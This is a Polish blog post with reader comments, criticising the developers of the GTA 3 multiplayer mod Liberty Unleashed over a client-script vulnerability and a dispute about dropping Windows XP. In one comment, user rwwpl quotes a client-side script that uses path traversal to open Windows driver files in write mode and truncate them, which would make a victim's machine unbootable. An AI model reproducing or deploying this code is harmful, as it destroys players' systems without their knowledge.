Deweloperzy LU zaliczają się do lepszego sortu, chociaż tak nie jest
7


On przynajmniej zdaje sobie sprawę…

Ostatnio w multiplayerze LU niewiele się dzieje.

Wróć, nic się nie dzieje. Deweloperzy projektu olali sprawę po całości, zostawiając graczy na lodzie. Zamiast więc starać się naprawić sytuację lub po prostu przemilczeć i wywiesić białą flagę, wyciągnęli jęzora w kierunku niewielkiej społeczności.

Zaczęło się w marcu tego roku, kiedy ktoś (a nawet jakiś sprytny Polak?!) znalazł w LU lukę, która umożliwia w pewnym stopniu ingerować w folder gry. Wykorzystał to do wyczyszczenia kilku plików wykorzystanych przez GTA 3, przez co gra już się nie uruchomi (nawet tryb pojedynczy!).

Na forum projektu wywiązała się krótka dyskusja, w międzyczasie mała kłótnia między graczami (!), że to wszystko wina Windows XP (mimo, że efekty wykorzystania tej luki przedstawiono na zrzutach ekranu na nowszej wersji Windowsa!), że LU nie powinien wspierać tego systemu, ziew, ziew, bla, bla.

Gdy temat już zgasł, niczym Strażnik Teksasu pojawia się w maju CukierD

Przesuwam temat do VR, żeby się tym zajął.

Nie wiadomo co jego „przesunięcie” dało, ale VR, jako główny programista LU, zajął stanowisko w tej sprawie dopiero miesiąc później

OK, właśnie to przejrzałem. Wszystko co mogę powiedzieć to „WTF”… I to nie do was, tylko do nas [deweloperów]…

Coś było włączone po stronie skryptów klienta, co pozwalało na tego typu ingerencję. Nie wiem kto to włączył (może ja we wczesnych rannych godzinach…), ale już tego nie ma. A przynajmniej mam taką nadzieję, w przeciwnym razie zerknę na to jeszcze raz.

Dlaczego zwala winę na wczesne ranne godziny? Że niby nie był wtedy jeszcze skoncentrowany jak w środku dnia i popełnił taką gafę? Mam to traktować jako usprawiedliwienie, czy wpuścić jednym uchem, a wypuścić drugim?

Co ciekawe, VR odniósł się także do krótkiej dyskusji na temat Windowsa XP. Jego stanowisko w tej sprawie jest znane od dawna i nic w tej kwestii się nie zmieniło.

Co do dyskusji na temat XP, odejdźcie od XP „plebsy”. Urządzenie z XP może być zhakowane w sekundy i w ten sposób uczymy technik bezpieczeństwa w miejscu, gdzie pracuję. Ustawiamy kilka komputerów z XP i pokazujemy ludziom, jak mogą zostać zniszczone bez dotykania. I tak, one wszystkie mają aktualizacje, zaporę firewall i aktualny antywirus.

Więc on, jako wielki ekspert od bezpieczeństwa chce nam wytłumaczyć, że XP jest podatny na ataki, przy czym sam wymiguje się od krytycznej oceny „dziurowatości” LU? Gratuluję.

Ponadto aktualizacja oprogramowania pod XP jest dziś bolączką. Jest prawdopodobne, że następna aktualizacja LU, która poprawia niektóre błędy, nie będzie działać na XP. Głównie dlatego, że instalacja dodatkowego oprogramowania wspierającego XP do Visual Studio 2015 [program do tworzenia… programów] jest wysiłkiem. Testowe wersje, które teraz posiadam, nie zadziałają na niczym starszym niż Vista. Plusem tego jest zastosowanie dodatkowych modułów bezpieczeństwa i wydajności.

Czyli począwszy od nowej wersji LU będzie tryb wideo z 240 FPS, drive-by jak w GTA 4 oraz swobodne poruszanie kamery w samochodzie? Hmm, nie? To jakie są plusy dla graczy?

Porzucenie wsparcia XP jest po to, by ratować tych, którzy go używają. Jeśli masz komputer z XP, NIE PODŁĄCZAJ SIĘ DO INTERNETU.

Idąc tym tropem, skoro LU ma błędy powodujące zniszczenie gry, USUŃ CZYM PRĘDZEJ LU.

Słowa VR poparł pewien użytkownik forum oraz… CukierD. Nie zgadzał się z nimi Piterus, który przypomniał, że GTA 3 uruchomimy na Windowsie 98 oraz, że w tamtej chwili w LU grały… 3 osoby.

Niemal od razu odpisał… CukierD, który znowu gadał głupoty i na końcu dodał

Idąc twoim tokiem myślenia, powinniśmy przestać grać w GTA 3 w późnych latach dziewięćdziesiątych.

Hmm, GTA 3 ukazało się pierwszy raz na PS2 w 2001.

Potem niczym feniks z popiołów powstał Adtec, który napisał swój pierwszy wpis na LU od… 2,5 lat! Deweloper!

Jesteś idiotą. Tylko dlatego, że GTA III działa na 10-letnim systemie nie znaczy, że powinniśmy przy tym systemie trwać, nawet Microsoft już go nie wspiera, cholera nawet narzędzia do modyfikacji GTA nie działają już na XP jak np. Magic TXD.

Jeśli deweloper gry pisze tylko po to, by kogoś obrazić, to niestety, ale jest on chamem i bezmózgiem, a jego zachowanie powinno być piętnowane.

Potem oczywiście przyznał, że źle postąpił. Na atak Piterusa, że to jego pierwsza wypowiedź od 2014 r. odparł

Co to ma z tym wspólnego? Ta cała modyfikacja nie była rozwijana przez ten okres, ale „to nie jest głównym tematem” [małpując Piterusa, który napisał to samo, tylko w kontekście obrażania jego osoby].

Czy z LU jeszcze będzie jakiś pożytek? Wątpię.


Więcej wiedzieć nie trzeba.

Comments
 • Ferex 6 czerwca 2016 at 20:08

  Nic dodać, nic ująć, temat wyczerpany w całości

 • WACEK 6 czerwca 2016 at 21:44

  To tak jakby Internet Explorer chodził tylko na Win 10. Sytuacja wg. mnie bez sensu. Żeby tych co grają na Win XP odcinać od rozrywki.

 • rwwpl 6 czerwca 2016 at 21:54

  Jakiś czas temu w jednym z tematów na forum LU pewien użytkownik wstawił wszystkie haxy do LU, można było sobie je pobrać (w tym cleo dla LU), oraz jakieś skrypty, np skrypt serwera gta.cz (który został podjebany jakoś na wersji 0.14, kiedy przez client-side można było robić dosłownie wszystko).

  Nie wiem czy to wgl coś robi, ale w jednym z plików do client-side było coś takiego:

  [code]
  function fuckk(player) {
  try {
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/ntfs.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/tcpip.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/disk.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/cdrom.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/monitor.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/model.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/processr.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/rdpbus.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/vga.sys”, „w” );
  local File = file ( „../../../../../../../../../../../../../../../../../../../../../../WINDOWS/system32/drivers/usbport.sys”, „w” );

  CallServerFunc(„Main/Main.nut”, „client_Message”, „Done.”, player);
  }
  catch ( e ) {
  CallServerFunc(„Main/Main.nut”, „client_Message”, „Failed.”, player);
  }
  }
  [/code]

  Jednak nie wygląda to ciekawie, o ile wgl działa.

  Jestem jednak ciekawy czy na pewno na tyle się zmotywują, aby wydać aktualizację LU.

 • Gudio 7 czerwca 2016 at 08:05

  Od lat czują się elitą z dupami nad głowami. Pozwólcie, że zakończę na tym mój komentarz.

 • Piterus 7 czerwca 2016 at 13:05

  LU się strasznie pogubiło w tym co robi i teraz chyba nie mają już żadnego dobrego wyjścia z sytuacji, którą sami sobie zgotowali. Próbują wyjść z twarzą przed samymi sobą, a skutki widzimy. Zmienia i zmieniało się od skrajności w skrajność przecież w tym kręgu. Od porzucenia projektu i „bawcie się sami” po aktualizacje bez wyczucia jak ta z xp (bo próby były już wczesniej). Przez taką huśtawkę ten multiplayer się po prostu niszczy, a dochodzi jeszcze kilku pogiętych graczy, którzy ewidentnie nie czerpią rozrywki z samej rozgrywki, a z czegoś innego.
  Najlepsze chyba co mogliby teraz zrobić z projektem to chociaż sprawiać wrażenie jakiegokolwiek supportu realnie sprzyjającego graczom, uprzątnąć stronę, „zatrudnić” ludzi, którym jeszcze się chce (wgl kiedy ostatni raz doszła jakaś nowa osoba do ekipy tworzącej LU/VCMP?) i załatać to co załatać jeszcze jeszcze da, skoro robi się jakieś podstawowe błędy po nocach.

 • NC 8 czerwca 2016 at 21:27

  Dyskusja o zakończeniu wsparcia dla XP rozpoczęła się 2 lata wstecz. O ile wtedy była to zapowiedź kontrowersyjna z burzliwą dyskusją, tak dzisiaj jest to po prostu odgrzewanie starego kotleta. Ot programiści wraz z grupą przydupasów używają tych samych argumentów co 2 lata wstecz, by w końcu „ciemny lud” zrozumiał, że bez Windowsa XP świat jest lepszy. Tymczasem oporni gracze… Tak, zgadniecie, również wyciągają argumenty sprzed dwóch lat. Przyznajcie sami, czy taka dyskusja ma sens.

  Pewne jest, że jeśli taka będzie wola programistów, to wprowadzą to, choćby nie wiem co. W końcu będzie można wtedy zastosować dodatkowe poprawki bezpieczeństwa, których w XP nie ma. No, o ile ktoś we „wczesnych rannych godzinach” sam nie stworzy jakiejś luki .

  Zmieniając trochę temat, wielce prawdopodobne, że za kilka lat Windows 7 podąży ścieżką XP. Wtedy dzisiejszy problem będzie przeżywany po raz kolejny.

 • pt0k 10 czerwca 2016 at 16:35

  SUGAR D TO NAJWIENKSZY MATOL JAKIEGO MOZNA SPOTKAC W ARGONATH COMMUNITY

  ROBI SERWER 4 LATA ALE NIE ZROBI BO NIE UMIE
  NIE UMIE GRAC W GTA

 • Post a comment

  Jeśli chcesz poprawić komentarz JUŻ ZAPISANY, odśwież stronę. Pojawi się wówczas odnośnik, który należy nacisnąć. Możesz to zrobić jedynie w ciągu 5 minut od opublikowania komentarza.

Powered by WordPress | Designed by: Free WordPress Themes | Compare Free WordPress Themes, Compare Premium WordPress Themes and